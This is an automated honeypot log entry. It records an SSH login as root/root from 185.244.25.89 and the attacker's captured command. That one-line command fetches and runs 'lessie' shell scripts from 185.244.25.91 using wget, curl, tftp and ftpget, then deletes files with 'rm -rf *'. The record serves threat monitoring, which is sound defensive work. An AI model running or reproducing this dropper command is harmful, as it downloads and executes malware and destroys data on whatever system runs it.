honeypots.tk

Record Observations : 185.244.25.89 ssh Web script execution 185.244.25.89 E46SNDKDKXDPM9AB

<< Back

185.244.25.89 client username 'root' and password 'root' entered
185.244.25.89 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.91/lessie.sh; curl -O http://185.244.25.91/lessie.sh; chmod 777 lessie.sh; sh lessie.sh; tftp 185.244.25.91 -c get lessie.sh; chmod 777 lessie.sh; sh lessie.sh; tftp -r lessie2.sh -g 185.244.25.91; chmod 777 lessie2.sh; sh lessie2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.244.25.91 lessie1.sh lessie1.sh; sh lessie1.sh; rm -rf lessie.sh lessie.sh lessie2.sh lessie1.sh; rm -rf *'
Author: Honeypots.tk Robot